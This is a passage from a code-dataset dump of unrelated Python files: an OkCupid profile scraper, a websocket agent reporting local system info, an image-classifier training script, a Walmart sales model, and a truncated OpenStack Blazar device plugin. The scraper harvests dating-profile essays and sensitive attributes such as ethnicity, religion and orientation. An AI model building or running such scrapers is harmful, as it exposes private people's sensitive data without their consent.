"matplotlib.pyplot.annotate", "line_number": 788, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 788, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.annotate", "line_number": 794, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 794, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 795, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 795, "usage_type": "name"}, {"api_name": "TA_functions.printTESTresults", "line_number": 834, "usage_type": "call"}, {"api_name": "TA_functions.remove_bad_stars", "line_number": 947, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 950, "usage_type": "call"}, {"api_name": "TA_functions.remove_bad_stars", "line_number": 954, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1019, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1019, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 1060, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 1061, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 1063, "usage_type": "call"}, {"api_name": "v2v3plots.make_plot", "line_number": 1066, "usage_type": "call"}, {"api_name": "os.path.join", 
"line_number": 1074, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1074, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 1079, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 1080, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 1086, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 1087, "usage_type": "call"}, {"api_name": "v2v3plots.make_plot", "line_number": 1094, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1224, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 1237, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1237, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 1347, "usage_type": "call"}]} +{"seq_id": "424727106", "text": "from scrapy.spiders import Spider\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.selector import Selector\nfrom scrapy.http import HtmlResponse\nfrom ok_cupid_crawler.items import OkCupidCrawlerItem\nfrom scrapy.http import Request\nfrom scrapy.utils.serialize import ScrapyJSONEncoder\nimport re\nfrom okCrawlerTools import extract_start_urls\n\n#\n#\n#
 sample profile-page elements targeted by the XPaths in parse() below,\n# e.g. dd id=\"ajax_smoking\" (plus the ajax_gender, ajax_ethnicities,\n# ajax_gentation, ajax_lookingfor, ajax_drinking, ajax_offspring,\n# ajax_education, ajax_religion and ajax_speaks elements)\n#
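 a minimal usage sketch (not part of the original spider) showing how one\n# of these fields can be read from a saved profile page with scrapy's\n# Selector; 'profile.html' is a hypothetical local copy, and the ajax_*\n# ids are the same ones parse() targets below:\n#   from scrapy.selector import Selector\n#   sel = Selector(text=open('profile.html').read())\n#   smokes = sel.xpath('.//dd[contains(@id,\"ajax_smoking\")]/text()').extract()\n#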
    \n\nclass okcSpider(Spider):\n # Description\n name = \"okCrawler\"\n allowed_domains = \"www.okcupid.com\"\n urls = extract_start_urls(\"okcLinks.txt\")\n #start_urls = [\"http://www.okcupid.com/profile/jab1980\", \"http://www.okcupid.com/profile/20neight10\"]\n start_urls = urls\n _encoder = ScrapyJSONEncoder()\n\n def parse(self, response):\n #hxs = HtmlXPathSelector(response)\n #titles = hxs.select(STUUFFFS).extract()\n sel = Selector(response)\n titles = sel.xpath('//script').extract()[0]\n \n item = OkCupidCrawlerItem()\n item[\"usr_loc\"] = response.xpath('.//title/text()').extract() \n item[\"gender\"] = response.xpath('.//span[contains(@class,\"ajax_gender\")]/text()').extract()\n item[\"race\"] = response.xpath('.//dd[contains(@id,\"ajax_ethnicities\")]/text()').extract()\n item[\"gentation\"] = response.xpath('.//li[contains(@id,\"ajax_gentation\")]/text()').extract() \n item[\"looking_for\"] = response.xpath('.//li[contains(@id,\"ajax_lookingfor\")]/text()').extract() \n item[\"smokes\"] = response.xpath('.//dd[contains(@id,\"ajax_smoking\")]/text()').extract()\n item[\"drinks\"] = response.xpath('.//dd[contains(@id,\"ajax_drinking\")]/text()').extract()\n item[\"offspring\"] = response.xpath('.//dd[contains(@id,\"ajax_offspring\")]/text()').extract() \n item[\"education\"] = response.xpath('.//dd[contains(@id,\"ajax_education\")]/text()').extract() \n item[\"religion\"] = response.xpath('.//dd[contains(@id,\"ajax_religion\")]/text()').extract() \n item[\"language\"] = response.xpath('.//dd[contains(@id,\"ajax_speaks\")]/text()').extract() \n item[\"text\"] = response.xpath('.//div[contains(@class, \"essay\")]/text()').extract()\n item[\"text\"] = [(itm.replace('\\r', ' ').replace('\\n', ' ')) for itm in item[\"text\"]] \n \n yield item", "sub_path": "ok_cupid_crawler/ok_cupid_crawler/spiders/okcSpider.py", "file_name": "okcSpider.py", "file_ext": "py", "file_size_in_byte": 2706, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "scrapy.spiders.Spider", "line_number": 31, "usage_type": "name"}, {"api_name": "okCrawlerTools.extract_start_urls", "line_number": 35, "usage_type": "call"}, {"api_name": "scrapy.utils.serialize.ScrapyJSONEncoder", "line_number": 38, "usage_type": "call"}, {"api_name": "scrapy.selector.Selector", "line_number": 43, "usage_type": "call"}, {"api_name": "ok_cupid_crawler.items.OkCupidCrawlerItem", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "433160952", "text": "import re\nimport json\nimport time\nimport logging\nimport socket\nimport asyncio\nimport subprocess\nfrom subprocess import PIPE\nfrom multiprocessing import Manager, Process\n\n\nimport websockets\nfrom websockets.exceptions import ConnectionClosed\n\n\nclass Minion:\n def __init__(self, rest=5):\n self.gru = None\n self.name = ''\n self.rest_time = rest\n self.hostname = socket.gethostname()\n # self.storage = {}\n self.storage = Manager().dict()\n\n def _hi_gru(self):\n # Send some initial info to Gru\n self._get_sys_data()\n return json.dumps(self.storage.copy())\n\n async def _process_gru_msg(self, msg):\n matched = re.match(r'^\\[(.+?)\\](.+)', msg)\n if matched:\n print(matched)\n print(msg)\n order, content = matched.groups()\n\n if order == 'name':\n self.name = content\n else:\n await self.gru.send(\"Maybe it's not an order: {}\".format(msg))\n # logging.info(\"Maybe it's not an order: {}\".format(msg))\n\n def _get_sys_data(self):\n commands = {\n 'cpu_num': 'grep processor /proc/cpuinfo | wc 
-l',\n 'cpu_mod': \"grep 'model name' /proc/cpuinfo | uniq | awk -F':' '{print $2}'\",\n 'mem_size': \"awk '/MemTotal/ {print $2}' /proc/meminfo\",\n 'root_size': \"df -Th | grep -E '/$'\",\n 'uname': 'uname -a'\n }\n\n jobs = []\n for dtype, cmd in commands.items():\n one_job = Process(target=self._execute, args=(dtype, cmd))\n jobs.append(one_job)\n\n for job in jobs:\n job.start()\n job.join() # join to wait sys data\n\n def _execute(self, datatype, cmd: str):\n pipe = subprocess.run(cmd, stdout=PIPE, stderr=PIPE, shell=True)\n std_out = pipe.stdout.decode().strip()\n # std_err = pipe.stderr.decode().strip()\n # print(\"stdout: {}\".format(std_out))\n # print(\"stderr: {}\".format(std_err))\n\n self.storage[datatype] = std_out\n\n async def _find_gru(self, uri):\n try:\n gru = await websockets.connect(uri)\n return gru\n except ConnectionRefusedError as ex:\n logging.info(\"Cannot connect to Gru: {}\".format(self._find_gru.__name__))\n logging.info(str(ex))\n return None\n\n async def work(self, uri):\n # Loop for reconnecting Gru\n while True:\n self.gru = await self._find_gru(uri)\n\n # Cannot connect to Gru\n if not self.gru:\n logging.info('Rest {} seconds, and retry finding Gru: {}'.format(self.rest_time, self.work.__name__))\n time.sleep(self.rest_time)\n continue\n\n await self.gru.send(self._hi_gru())\n\n try:\n # Loop for communicating to Gru\n while True:\n gru_msg = await self.gru.recv()\n logging.info(\"Gru said: {}\".format(gru_msg))\n await self._process_gru_msg(gru_msg)\n\n except ConnectionClosed as ex:\n logging.error('Gru died T T')\n logging.info(str(ex))\n logging.info('Rest {} seconds, and retry finding Gru: {}'.format(self.rest_time, self.work.__name__))\n\n time.sleep(self.rest_time)\n continue\n\n\nif __name__ == '__main__':\n logging.basicConfig(format='[%(asctime)s][%(levelname)s]: %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n level=logging.INFO)\n logging.info(\"Finding Gru ...\")\n minion = Minion()\n asyncio.get_event_loop().run_until_complete(minion.work('ws://localhost:8000/ws'))\n", "sub_path": "minion.py", "file_name": "minion.py", "file_ext": "py", "file_size_in_byte": 3714, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "socket.gethostname", "line_number": 21, "usage_type": "call"}, {"api_name": "multiprocessing.Manager", "line_number": 23, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 28, "usage_type": "call"}, {"api_name": "re.match", "line_number": 31, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 54, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 62, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 62, "usage_type": "name"}, {"api_name": "websockets.connect", "line_number": 72, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 75, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 76, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 86, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 87, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 96, "usage_type": "call"}, {"api_name": "websockets.exceptions.ConnectionClosed", "line_number": 99, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 100, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 101, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 102, "usage_type": "call"}, {"api_name": "time.sleep", 
"line_number": 104, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 109, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 111, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 112, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 114, "usage_type": "call"}]} +{"seq_id": "493499593", "text": "import numpy as np\nfrom keras import applications\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.utils import to_categorical\nfrom keras import optimizers\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dropout, Flatten, Dense\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.preprocessing import LabelBinarizer\nimport pickle\nimport matplotlib.pyplot as plt\n\n\nimg_width, img_height = 100, 100\ntop_model_weights_path = 'fc_model.h5'\nmodel_path = 'cnn_model.h5'\nepochs = 100 #100\nbatch_size = 32 #32\nnum_classes = 5\nsplit_num = 5 #5\n\n\ndef cnn_train_model(train_data,train_label,class_weights):\n # construct vgg-16 model without fully connected layer\n base_model = applications.VGG16(weights='imagenet', include_top=False, input_shape=(img_height, img_width, 3))\n print('Model loaded.',len(base_model.layers))\n\n # construct fully connected layer\n top_model = Sequential()\n top_model.add(Flatten(input_shape=base_model.output_shape[1:]))\n top_model.add(Dense(256, activation='relu'))\n top_model.add(Dropout(0.5))\n top_model.add(Dense(num_classes, activation='softmax'))\n print('top-model added')\n\n\n #top_model.load_weights(top_model_weights_path)\n #print('top model weight load')\n\n # concatenate the the non-top vgg-16 model and fully connected layer\n model = Model(inputs=base_model.input, outputs=top_model(base_model.output))\n\n # frozen the fist 14 layers of vgg-16 model\n for layer in model.layers[:15]:\n layer.trainable = False\n\n # set loss function and optimizer\n model.compile(loss='categorical_crossentropy',\n optimizer=optimizers.SGD(lr=1e-4, momentum=0.9),\n metrics=['accuracy'])\n\n\n #checkpoint = ModelCheckpoint(best_weight_path, monitor='val_acc', verbose=1, save_best_only=True, mode='max')\n #callbacks_list = [checkpoint]\n\n #set k-fold cross validation\n kfold = StratifiedKFold(n_splits=split_num, shuffle=True, random_state=0)\n val_acc_scores = [] #to record the history of val_acc\n train_loss_scores = [] #to record the hostory of train_loss\n train_acc_scores = [] #to record the history of train_acc\n lb = LabelBinarizer()\n\n for train,validation in kfold.split(train_data,train_label):\n\n #transform string labels into binarizer\n train_label_bin = lb.fit_transform(train_label)\n\n\n # train dataset generator\n train_datagen = ImageDataGenerator(\n rescale=1. / 255,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True,\n fill_mode=\"nearest\",\n )\n\n train_generator = train_datagen.flow(\n train_data[train],\n train_label_bin[train],\n batch_size=batch_size,\n )\n\n # validation dataset generator\n validation_datagen = ImageDataGenerator(rescale=1. 
/ 255)\n\n        validation_generator = validation_datagen.flow(\n            train_data[validation],\n            train_label_bin[validation],\n            batch_size=batch_size,\n        )\n\n        # train the model\n        h = model.fit_generator(\n            train_generator,\n            steps_per_epoch=len(train_data[train]) // batch_size,\n            epochs=epochs,\n            validation_data=validation_generator,\n            validation_steps=len(train_data[validation]) // batch_size,\n            class_weight=class_weights,\n        )\n\n        # evaluate the model with the validation dataset\n        vc_scores = model.evaluate_generator(validation_generator, len(train_data[validation]) // batch_size)\n\n        print(\"val_%s: %.2f%%\" % (model.metrics_names[1],vc_scores[1]*100))\n\n        #add history to corresponding lists\n        train_loss_scores.append(h.history[\"loss\"])\n        train_acc_scores.append(h.history[\"acc\"])\n        val_acc_scores.append(h.history[\"val_acc\"])\n\n    print(\"val_acc = %.2f%% (+/- %.2f%%)\" % (np.mean(val_acc_scores), np.std(val_acc_scores)))\n    train_loss_scores = np.array(train_loss_scores).ravel()\n    train_acc_scores = np.array(train_acc_scores).ravel()\n    val_acc_scores = np.array(val_acc_scores).ravel()\n\n    # save the model to disk\n    print(\"serializing neural network...\")\n    model.save(model_path)\n\n    # save the label binarizer to disk\n    print(\"serializing label binarizer...\")\n    f = open(\"lb.pickle\", \"wb\")\n    f.write(pickle.dumps(lb))\n    f.close()\n\n\n    #plot the training loss and validation accuracy\n    plt.style.use(\"ggplot\")\n    x = np.arange(0, split_num * epochs)\n    plt.figure()\n    plt.subplot(1,2,1)\n    plt.plot(x, train_loss_scores, label=\"train loss\")\n    plt.plot(x, train_acc_scores, label=\"train accuracy\")\n    plt.title(\"Training Loss and Accuracy\")\n    plt.xlabel(\"Epoch * K-fold N_split\")\n    plt.ylabel(\"Loss/Accuracy\")\n    plt.legend(loc = \"upper left\")\n    plt.subplot(1,2,2)\n    plt.plot(x, val_acc_scores)\n    plt.title(\"Validation Accuracy\")\n    plt.xlabel(\"Epoch * K-fold N_split\")\n    plt.ylabel(\"Validation Accuracy\")\n    plt.savefig(\"acc_loss_plot\")\n\n", "sub_path": "TrainCNNModel.py", "file_name": "TrainCNNModel.py", "file_ext": "py", "file_size_in_byte": 5679, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "keras.applications.VGG16", "line_number": 26, "usage_type": "call"}, {"api_name": "keras.applications", "line_number": 26, "usage_type": "name"}, {"api_name": "keras.models.Sequential", "line_number": 30, "usage_type": "call"}, {"api_name": "keras.layers.Flatten", "line_number": 31, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 32, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 33, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 34, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 42, "usage_type": "call"}, {"api_name": "keras.optimizers.SGD", "line_number": 50, "usage_type": "call"}, {"api_name": "keras.optimizers", "line_number": 50, "usage_type": "name"}, {"api_name": "sklearn.model_selection.StratifiedKFold", "line_number": 58, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelBinarizer", "line_number": 62, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 71, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 
115, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 117, "usage_type": "call"}, {"api_name": "pickle.dumps", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style.use", "line_number": 131, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 131, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 131, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 133, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 133, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 134, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 136, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 137, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 138, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 138, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 139, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 140, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 141, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 141, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 142, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 142, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 143, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 144, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 144, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 145, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 145, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 146, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 146, "usage_type": "name"}]} +{"seq_id": "186147986", "text": "# -*- coding: utf-8 -*-\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nimport time\r\n\r\nstart_time = time.time()\r\n\r\n# Import Data\r\ntrain = pd.read_csv('train.csv',header=0)\r\nweather = pd.read_csv('weather.csv',header=0)\r\nkey = pd.read_csv('key.csv',header=0)\r\ntest = pd.read_csv('test.csv',header=0)\r\nweather_idx = np.load('weather_idx.npy')\r\nsampleSub = pd.read_csv('sampleSubmission.csv',header=0)\r\nweather_idx_test = np.load('weather_idx_test.npy')\r\n\r\n# Enumerate Training Dates\r\ntrain['year'] = [int(x[0:4]) for x in list(train['date'])]\r\nstart_year = 
np.min(train['year'])\r\ntrain['year'] = train['year']-start_year\r\ntrain['month'] = [int(x[5:7]) for x in list(train['date'])]\r\ntrain['day'] = [int(x[8:]) for x in list(train['date'])]\r\ntrain = train.drop(['date'],axis=1)\r\n\r\n# Get Weekday Values\r\ntrain['month_days'] = 0\r\ntrain['month_days'][train['month']==2] = 31\r\ntrain['month_days'][train['month']==3] = 28+31\r\ntrain['month_days'][train['month']==4] = 31+28+31\r\ntrain['month_days'][train['month']==5] = 30+31+28+31\r\ntrain['month_days'][train['month']==6] = 31+30+31+28+31\r\ntrain['month_days'][train['month']==7] = 30+31+30+31+28+31\r\ntrain['month_days'][train['month']==8] = 31+30+31+30+31+28+31\r\ntrain['month_days'][train['month']==9] = 31+31+30+31+30+31+28+31\r\ntrain['month_days'][train['month']==10] = 30+31+31+30+31+30+31+28+31\r\ntrain['month_days'][train['month']==11] = 31+30+31+31+30+31+30+31+28+31\r\ntrain['month_days'][train['month']==12] = 30+31+30+31+31+30+31+30+31+28+31\r\ntrain['month_days'][(train['year']==0)&(train['month']!=1)&(train['month']!=2)] = 1 + train['month_days'][train['year']==0]\r\ntrain['year_days']=0\r\ntrain['year_days'][train['year']==1]=366\r\ntrain['year_days'][train['year']==2]=366+365\r\ntrain['total_days'] = 0\r\ntrain['total_days'] = train[['day','month_days','year_days']].sum(axis=1)\r\ntrain['weekday'] = 0\r\ntrain['weekday'] = train['total_days'].mod(7)\r\ntrain = train.drop(['month_days','year_days','total_days'],axis=1)\r\n\r\n# Enumerate Weather Dates\r\nweather['year'] = [int(x[0:4]) for x in list(weather['date'])]\r\nweather['year'] = weather['year']-start_year\r\nweather['month'] = [int(x[5:7]) for x in list(weather['date'])]\r\nweather['day'] = [int(x[8:]) for x in list(weather['date'])]\r\nweather = weather.drop(['date'],axis=1)\r\n\r\n# Fill col_list with all unique codesum values from codesum strings\r\ncol_list = []\r\nfor i in range(0,len(weather)):\r\n temp = weather['codesum'][i].split()\r\n num_codes = len(temp)\r\n for i2 in range(0,len(temp)):\r\n if temp[i2] in weather.columns:\r\n weather.ix[i,temp[i2]] = 1\r\n else:\r\n weather[temp[i2]] = 0\r\n weather.ix[i,temp[i2]] = 1\r\n col_list.append(temp[i2])\r\n\r\n# Add codesum Values\r\nfor i in range(0,len(col_list)):\r\n train[col_list[i]] = 0\r\n train[col_list[i]] = weather.ix[weather_idx,col_list[i]].values\r\n\r\n# Save Important Values\r\nnum_stores = len(train['store_nbr'].unique())\r\nnum_items = len(train['item_nbr'].unique())\r\n\r\n# Create Training Datasets\r\ntrain_in_all = train.drop(['units'],axis=1).copy()\r\ntrain_out_all = train['units']\r\n\r\n# Create Training & Validation Datasets\r\nnum_train = int(round(.9*len(train_in_all)))\r\nnum_val = int(len(train_in_all)-num_train)\r\ntrain_ind = np.sort(np.random.choice(train_in_all.index,size=num_train,replace=False))\r\nbool1 = np.zeros((len(train_in_all),1),dtype=bool)\r\nbool1[train_ind] = True\r\nbool2 = ~bool1\r\nvalid_ind = train_in_all[bool2].index\r\ntrain_in = train_in_all[bool1]\r\ntrain_out = train_out_all[train_ind]\r\nvalid_in = train_in_all[bool2]\r\nvalid_out = train_out_all[valid_ind]\r\n\r\n# Train RF\r\nrf = RandomForestRegressor(n_estimators = 50, n_jobs=-1, min_samples_split = 11, min_samples_leaf = 8)\r\nrf = rf.fit(train_in,train_out)\r\n\r\n# Validate RF!!\r\nvalidation = rf.predict(valid_in)\r\nvalid_score = np.sqrt(np.sum(np.square(np.log(validation+1)-np.log(valid_out+1)))/len(validation))\r\n \r\nprint('This program had a validation score of ' + str(valid_score) + '.')\r\nprint('This program took ' + 
str((time.time()-start_time)/60) + ' minutes to run.')\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "sub_path": "walmartAttempt.py", "file_name": "walmartAttempt.py", "file_ext": "py", "file_size_in_byte": 4233, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "time.time", "line_number": 9, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 12, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 13, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 87, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 88, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 103, "usage_type": "call"}, {"api_name": "time.time", "line_number": 106, "usage_type": "call"}]} +{"seq_id": "88989066", "text": "# -*- coding: utf-8 -*-\n#\n# Author: Pierre Riteau \n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom collections import defaultdict\nimport datetime\n\nfrom oslo_config import cfg\nfrom oslo_utils import strutils\nfrom stevedore import named\n\nfrom blazar.db import api as db_api\nfrom blazar.db import exceptions as db_ex\nfrom blazar.db import utils as db_utils\nfrom blazar.manager import exceptions as manager_ex\nfrom blazar.plugins import base\nfrom blazar.plugins import devices as plugin\nfrom blazar.plugins import monitor\nfrom blazar import status\nfrom blazar.utils import plugins as plugins_utils\nfrom oslo_log import log as logging\nfrom random import shuffle\n\n\nplugin_opts = [\n cfg.StrOpt('before_end',\n default='',\n help='Actions which we will be taken before the end of '\n 'the lease'),\n cfg.ListOpt('plugins',\n default=['zun.plugin'],\n help='All plugins to use (one for every device driver to '\n 'support.)'),\n cfg.IntOpt('cleaning_time',\n default=0,\n min=0,\n help='The minimum interval [minutes] between the end of a '\n 'lease and the start of the next lease for the same '\n 'device. 
This interval is used for cleanup.'),\n cfg.StrOpt('default_resource_properties',\n default='',\n help='Default resource_properties when creating a lease of '\n 'this type.'),\n cfg.BoolOpt('display_default_resource_properties',\n default=True,\n help='Display default resource_properties if allocation fails '\n 'due to not enough resources'),\n cfg.BoolOpt('retry_allocation_without_defaults',\n default=True,\n help='Whether an allocation should be retried on failure '\n 'without the default properties'),\n]\n\nplugin_opts.extend(monitor.monitor_opts)\n\nCONF = cfg.CONF\nCONF.register_opts(plugin_opts, group=plugin.RESOURCE_TYPE)\nLOG = logging.getLogger(__name__)\n\nbefore_end_options = ['', 'default', 'email']\n\nQUERY_TYPE_ALLOCATION = 'allocation'\n\nMONITOR_ARGS = {\"resource_type\": plugin.RESOURCE_TYPE}\n\n\ndef _get_plugins():\n \"\"\"Return dict of resource-plugin class pairs.\"\"\"\n plugins = {}\n\n extension_manager = named.NamedExtensionManager(\n namespace='blazar.device.driver.plugins',\n names=CONF.device.plugins,\n invoke_on_load=False\n )\n\n for ext in extension_manager.extensions:\n try:\n plugin_obj = ext.plugin()\n except Exception as e:\n LOG.warning(\"Could not load {0} plugin \"\n \"for resource type {1} '{2}'\".format(\n ext.name, ext.plugin.device_driver, e))\n else:\n if plugin_obj.device_driver in plugins:\n msg = (\"You have provided several plugins for \"\n \"one device driver in configuration file. \"\n \"Please set one plugin per device driver.\")\n raise manager_ex.PluginConfigurationError(error=msg)\n\n plugins[plugin_obj.device_driver] = plugin_obj\n return plugins\n\n\nclass DevicePlugin(base.BasePlugin):\n \"\"\"Plugin for device resource.\"\"\"\n resource_type = plugin.RESOURCE_TYPE\n title = 'Device Plugin'\n description = 'This plugin creates and deletes devices.'\n query_options = {\n QUERY_TYPE_ALLOCATION: ['lease_id', 'reservation_id']\n }\n\n def __init__(self):\n super(DevicePlugin, self).__init__()\n self.plugins = _get_plugins()\n self.monitor = DeviceMonitorPlugin(**MONITOR_ARGS)\n self.monitor.register_reallocater(self._reallocate)\n\n def reserve_resource(self, reservation_id, values):\n \"\"\"Create reservation.\"\"\"\n device_ids = self.allocation_candidates(values)\n\n if not device_ids:\n raise manager_ex.NotEnoughDevicesAvailable()\n\n device_rsrv_values = {\n 'reservation_id': reservation_id,\n 'resource_properties': values['resource_properties'],\n 'count_range': values['count_range'],\n 'status': 'pending',\n 'before_end': values['before_end'],\n }\n device_reservation = db_api.device_reservation_create(\n device_rsrv_values)\n for device_id in device_ids:\n db_api.device_allocation_create({'device_id': device_id,\n 'reservation_id': reservation_id})\n return device_reservation['id']\n\n def update_reservation(self, reservation_id, values):\n \"\"\"Update reservation.\"\"\"\n reservation = db_api.reservation_get(reservation_id)\n lease = db_api.lease_get(reservation['lease_id'])\n\n if (not [x for x in values.keys() if x in ['min', 'max',\n 'resource_properties']]\n and values['start_date'] >= lease['start_date']\n and values['end_date'] <= lease['end_date']):\n # Nothing to update\n return\n\n dates_before = {'start_date': lease['start_date'],\n 'end_date': lease['end_date']}\n dates_after = {'start_date': values['start_date'],\n 'end_date': values['end_date']}\n device_reservation = db_api.device_reservation_get(\n reservation['resource_id'])\n self._update_allocations(dates_before, dates_after, reservation_id,\n 
